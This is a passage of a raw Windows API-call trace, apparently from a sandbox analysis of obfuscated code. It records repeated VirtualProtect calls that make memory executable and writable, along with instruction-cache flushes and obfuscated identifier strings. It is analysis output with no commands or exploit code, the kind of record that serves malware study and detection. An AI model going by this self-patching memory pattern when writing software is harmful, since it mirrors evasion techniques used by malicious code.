FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.418] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.419] GetCurrentProcess () returned 0xffffffff [0105.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.419] GetCurrentProcess () returned 0xffffffff [0105.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.419] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.419] GetCurrentProcess () returned 0xffffffff [0105.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.419] GetCurrentProcess () returned 0xffffffff [0105.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.419] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.420] GetCurrentProcess () returned 0xffffffff [0105.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.420] GetCurrentProcess () returned 0xffffffff [0105.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.420] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.421] GetCurrentProcess () returned 0xffffffff [0105.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.421] GetCurrentProcess () returned 0xffffffff [0105.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.421] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.422] GetCurrentProcess () returned 0xffffffff [0105.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.422] GetCurrentProcess () returned 0xffffffff [0105.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.422] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.422] GetCurrentProcess () returned 0xffffffff [0105.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.423] GetCurrentProcess () returned 0xffffffff [0105.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.423] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.423] GetCurrentProcess () returned 0xffffffff [0105.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.423] GetCurrentProcess () returned 0xffffffff [0105.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.423] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.424] GetCurrentProcess () returned 0xffffffff [0105.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.424] GetCurrentProcess () returned 0xffffffff [0105.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.424] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.425] GetCurrentProcess () returned 0xffffffff [0105.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.425] GetCurrentProcess () returned 0xffffffff [0105.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.425] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.425] GetCurrentProcess () returned 0xffffffff [0105.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.425] GetCurrentProcess () returned 0xffffffff [0105.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.425] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.426] GetCurrentProcess () returned 0xffffffff [0105.426] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.427] GetAsyncKeyState (vKey=3) returned 0 [0105.427] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.427] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.427] CRetailMalloc_Alloc () returned 0xcac7780 [0105.427] memcpy (in: _Dst=0xaf5168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.427] memcpy (in: _Dst=0xaf516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.427] memcpy (in: _Dst=0xaf516c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.427] memcpy (in: _Dst=0xaf516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.427] memcpy (in: _Dst=0xaf5170, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.427] memcpy (in: _Dst=0xaf516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52e2a, cbMultiByte=28, lpWideCharStr=0x197348, cchWideChar=29 | out: lpWideCharStr="–—––—–—————–—–––––––—————–—") returned 28 [0105.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1015a, cbMultiByte=28, lpWideCharStr=0x1973a8, cchWideChar=29 | out: lpWideCharStr="–—––—–—————–—–––––––—————–—") returned 28 [0105.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1015a, cbMultiByte=28, lpWideCharStr=0x1973a8, cchWideChar=29 | out: lpWideCharStr="–—––—–—————–—–––––––—————–—") returned 28 [0105.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1015a, cbMultiByte=28, lpWideCharStr=0x1973a8, cchWideChar=29 | out: lpWideCharStr="–—––—–—————–—–––––––—————–—") returned 28 [0105.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1015a, cbMultiByte=28, lpWideCharStr=0x1973a8, cchWideChar=29 | out: lpWideCharStr="–—––—–—————–—–––––––—————–—") returned 28 [0105.428] CRetailMalloc_Alloc () returned 0xc847ed0 [0105.428] _mbscpy_s (in: _Dst=0xc847ed0, _DstSizeInBytes=0x1c, _Src=0x9d1015a | out: _Dst=0xc847ed0) returned 0x0 [0105.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10b56, cbMultiByte=35, lpWideCharStr=0x1973b8, cchWideChar=36 | out: lpWideCharStr="_B_var_–—––—–—————–—–––––––—————–—") returned 35 [0105.429] CRetailMalloc_Free () returned 0x1 [0105.429] _mbscpy_s (in: _Dst=0x1974d0, _DstSizeInBytes=0x12, _Src=0x9d101f6 | out: _Dst=0x1974d0) returned 0x0 [0105.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2da688, cbMultiByte=8, lpWideCharStr=0x9eb0c9c, cchWideChar=18 | out: lpWideCharStr="EaQ9dcGS") returned 8 [0105.429] memcpy (in: _Dst=0x88f1fe8, _Src=0x9eb0c98, _Size=0x16 | out: _Dst=0x88f1fe8) returned 0x88f1fe8 [0105.429] memcpy (in: _Dst=0xaf5168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.429] memcpy (in: _Dst=0xaf5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2da69a, cbMultiByte=8, lpWideCharStr=0x9eb104e, cchWideChar=18 | out: lpWideCharStr="OIW_739_") returned 8 [0105.429] memcpy (in: _Dst=0x88f2004, _Src=0x9eb104a, _Size=0x16 | out: _Dst=0x88f2004) returned 0x88f2004 [0105.429] memcpy (in: _Dst=0xaf516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.429] memcpy (in: _Dst=0xaf516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.429] memcpy (in: _Dst=0xaf5168, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.429] memcpy (in: _Dst=0xaf5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.429] memcpy (in: _Dst=0xaf516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf5174, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf5174, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0105.430] memcpy (in: _Dst=0xaf5270, _Src=0x19754c, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0105.430] memcpy (in: _Dst=0xaf5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.430] memcpy (in: _Dst=0xaf516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.430] memcpy (in: _Dst=0xaf5168, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.430] memcpy (in: _Dst=0xaf5168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.430] memcpy (in: _Dst=0xaf516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf5174, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf5174, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0105.430] memcpy (in: _Dst=0xaf5178, _Src=0x19759c, _Size=0x4 | out: _Dst=0xaf5178) returned 0xaf5178 [0105.430] memcpy (in: _Dst=0xaf5174, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0105.430] memcpy (in: _Dst=0xaf5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0105.430] memcpy (in: _Dst=0xaf516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.430] memcpy (in: _Dst=0xaf516c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.431] memcpy (in: _Dst=0xaf516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.431] memcpy (in: _Dst=0xaf5168, _Src=0x197548, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.431] memcpy (in: _Dst=0xaf516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0105.431] memcpy (in: _Dst=0xaf5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.431] memcpy (in: _Dst=0xcac7847, _Src=0x1974fc, _Size=0x1 | out: _Dst=0xcac7847) returned 0xcac7847 [0105.431] memcpy (in: _Dst=0xcac78e0, _Src=0x197604, _Size=0x18 | out: _Dst=0xcac78e0) returned 0xcac78e0 [0105.432] CRetailMalloc_Realloc () returned 0xcac7780 [0105.432] CRetailMalloc_Free () returned 0x1 [0105.432] GetCurrentProcess () returned 0xffffffff [0105.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.432] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.433] GetCurrentProcess () returned 0xffffffff [0105.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.433] GetCurrentProcess () returned 0xffffffff [0105.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.433] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.434] GetCurrentProcess () returned 0xffffffff [0105.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.434] GetCurrentProcess () returned 0xffffffff [0105.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.434] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.434] GetCurrentProcess () returned 0xffffffff [0105.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.434] GetCurrentProcess () returned 0xffffffff [0105.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.434] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.435] GetCurrentProcess () returned 0xffffffff [0105.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.435] GetCurrentProcess () returned 0xffffffff [0105.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.435] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.435] GetCurrentProcess () returned 0xffffffff [0105.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.436] GetCurrentProcess () returned 0xffffffff [0105.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.436] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.436] GetCurrentProcess () returned 0xffffffff [0105.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.436] GetCurrentProcess () returned 0xffffffff [0105.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.436] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.437] GetCurrentProcess () returned 0xffffffff [0105.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.437] GetCurrentProcess () returned 0xffffffff [0105.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.437] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.437] GetCurrentProcess () returned 0xffffffff [0105.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.437] GetCurrentProcess () returned 0xffffffff [0105.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.437] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.438] GetCurrentProcess () returned 0xffffffff [0105.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.438] GetCurrentProcess () returned 0xffffffff [0105.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.438] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.439] GetCurrentProcess () returned 0xffffffff [0105.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.439] GetCurrentProcess () returned 0xffffffff [0105.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.439] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.439] GetCurrentProcess () returned 0xffffffff [0105.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.439] GetCurrentProcess () returned 0xffffffff [0105.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.439] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.440] GetCurrentProcess () returned 0xffffffff [0105.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.440] GetCurrentProcess () returned 0xffffffff [0105.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.440] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.440] GetCurrentProcess () returned 0xffffffff [0105.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.441] GetCurrentProcess () returned 0xffffffff [0105.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.441] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.441] GetCurrentProcess () returned 0xffffffff [0105.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.441] GetCurrentProcess () returned 0xffffffff [0105.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.441] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.442] GetCurrentProcess () returned 0xffffffff [0105.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.442] GetCurrentProcess () returned 0xffffffff [0105.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.442] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.443] GetCurrentProcess () returned 0xffffffff [0105.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.443] GetCurrentProcess () returned 0xffffffff [0105.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.443] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.443] GetCurrentProcess () returned 0xffffffff [0105.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.443] GetCurrentProcess () returned 0xffffffff [0105.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.443] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.444] GetCurrentProcess () returned 0xffffffff [0105.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.444] GetCurrentProcess () returned 0xffffffff [0105.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.444] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.445] GetCurrentProcess () returned 0xffffffff [0105.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.445] GetCurrentProcess () returned 0xffffffff [0105.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.445] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.445] GetCurrentProcess () returned 0xffffffff [0105.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.445] GetCurrentProcess () returned 0xffffffff [0105.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.445] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.446] GetCurrentProcess () returned 0xffffffff [0105.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.446] GetCurrentProcess () returned 0xffffffff [0105.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.446] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.447] GetCurrentProcess () returned 0xffffffff [0105.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.447] GetCurrentProcess () returned 0xffffffff [0105.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.447] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.447] GetCurrentProcess () returned 0xffffffff [0105.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.447] GetCurrentProcess () returned 0xffffffff [0105.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.447] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.497] GetCurrentProcess () returned 0xffffffff [0105.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.497] GetCurrentProcess () returned 0xffffffff [0105.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.497] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.498] GetCurrentProcess () returned 0xffffffff [0105.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.498] GetCurrentProcess () returned 0xffffffff [0105.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.498] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.498] GetCurrentProcess () returned 0xffffffff [0105.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.498] GetCurrentProcess () returned 0xffffffff [0105.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.498] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.499] GetCurrentProcess () returned 0xffffffff [0105.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.499] GetCurrentProcess () returned 0xffffffff [0105.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.499] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.499] GetCurrentProcess () returned 0xffffffff [0105.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.499] GetCurrentProcess () returned 0xffffffff [0105.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.499] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0105.500] GetCurrentProcess () returned 0xffffffff [0105.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.500] GetCurrentProcess () returned 0xffffffff [0105.500] 